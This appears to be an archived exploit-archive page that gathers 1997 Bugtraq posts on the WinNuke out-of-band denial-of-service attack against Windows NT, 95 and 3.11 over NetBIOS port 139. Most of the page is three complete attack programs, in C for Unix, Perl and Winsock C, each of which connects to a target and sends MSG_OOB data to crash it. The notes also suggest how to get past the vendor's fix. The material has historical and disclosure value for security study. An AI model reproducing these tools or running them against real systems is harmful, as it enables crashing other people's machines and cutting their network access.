Windows NT/95/3.11 Out Of Band (OOB) data barf
| Description: | Windows NT will completely crash if you send Out of Band (MSG_OOB) data to its port 139. Win95 will blue screen and network connectivity is usually lost, applications may crash. Win 3.11 with the M$ TCP/IP stack crashes too. Other ports like MS DNS may also be affected. |
| Author: | myst <myst@LIGHT-HOUSE.NET> |
| Compromise: | Stupid DOS attack, but it can be humorous. |
| Vulnerable Systems: | WinNT 4.0, 3.51, Win95 , WFWG 3.11 |
| Date: | 9 May 1997 |
| Notes: | I'm also appending the perl exploit code and the visual basic code. The M$ FIX in service pack 3 and the Hotfix does NOT work! You just have to change the code a bit, or use the Macintosh exploit. Change the TCP Urgent pointer if you want to exploit the post-servicepacke 3 conditon from a UNIX box. |
Date: Fri, 9 May 1997 22:11:55 -0400
From: myst <myst@LIGHT-HOUSE.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows 95/NT DoS
Hello,
It is possible to remotely cause denial of service to any windows
95/NT user. It is done by sending OOB [Out Of Band] data to an
established connection you have with a windows user. NetBIOS [139] seems
to be the most effective since this is a part of windows. Apparently
windows doesn't know how to handle OOB, so it panics and crazy things
happen. I have heard reports of everything from windows dropping carrier
to the entire screen turning white. Windows also sometimes has trouble
handling anything on a network at all after an attack like this. A
reboot fixes whatever damage this causes. Code follows.
_eci
--- CUT HERE ---
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define dport 139 /* Attack port: 139 is what we want */
int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}
if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}
void main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
open_sock(s,argv[1],dport);
printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(100000);
printf("Done!\n");
close(s);
}
Date: Sun, 11 May 1997 16:49:16 -0700
From: Ghent <ghent@BOUNTY-HUNTERS.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: more DoS fun
Here is a perl version if anyone wants to play with it.
------
#!/usr/bin/perl
# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci
use strict; use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }
$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;
print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;
------
- Ghent
Date: Sun, 11 May 1997 15:03:36 +0400
From: Eugene Surovegin <ebs@GLASNET.RU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows port of OOB attack code
Hello,
Here is a Windows port of original winnuke.c by _eci. I compiled it with MS
Visual C++ 4.2b.
I added one additional parameter - <port>.
Now you can call
>winnuke.exe www.microsoft.com 135
It looks like only port 139 is vulnerable (but who knows...)
--- CUT HERE ---
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
// Windows NT port by Eugene Surovegin <ebs@glasnet.ru>
// Compiled with MS Visual C++ 4.2b, tested on NT 4.0 SP2
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <winsock.h>
#define dport 139 /* Attack port: 139 is what we want */
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
int res;
memset((char *)&blah,0,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL)
memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
else
if ((blah.sin_addr.s_addr = inet_addr(server))==INADDR_NONE) {
puts("Cannot resolve host");
return(-3);
}
if (res=connect(sock,(struct sockaddr *)&blah,16)==-1) {
puts("Cannot connect socket");
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return 0;
}
void main(int argc, char *argv[]) {
int s;
char *str = "Bye"; /* Makes no diff */
int port=0;
if ( (argc<2) || (argc>3)) {
printf("Usage: %s <target> [<port>]>\n",argv[0]);
exit(0);
}
if (argc==3) port=atoi(argv[2]);
if (!port) port=dport;
WSADATA wsaData;
if (!WSAStartup(MAKEWORD(1, 1), &wsaData)){
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))!=INVALID_SOCKET) {
if (!open_sock(s,argv[1],port)){
puts("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
puts("Done!");
}
else printf("Error connecting to host %s",argv[1]);
closesocket(s);
}
else puts("Error getting socket");
WSACleanup();
}
else puts("Cannot init Winsock");
}
--- CUT HERE ---
Eugene Surovegin <ebs@glasnet.ru>
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
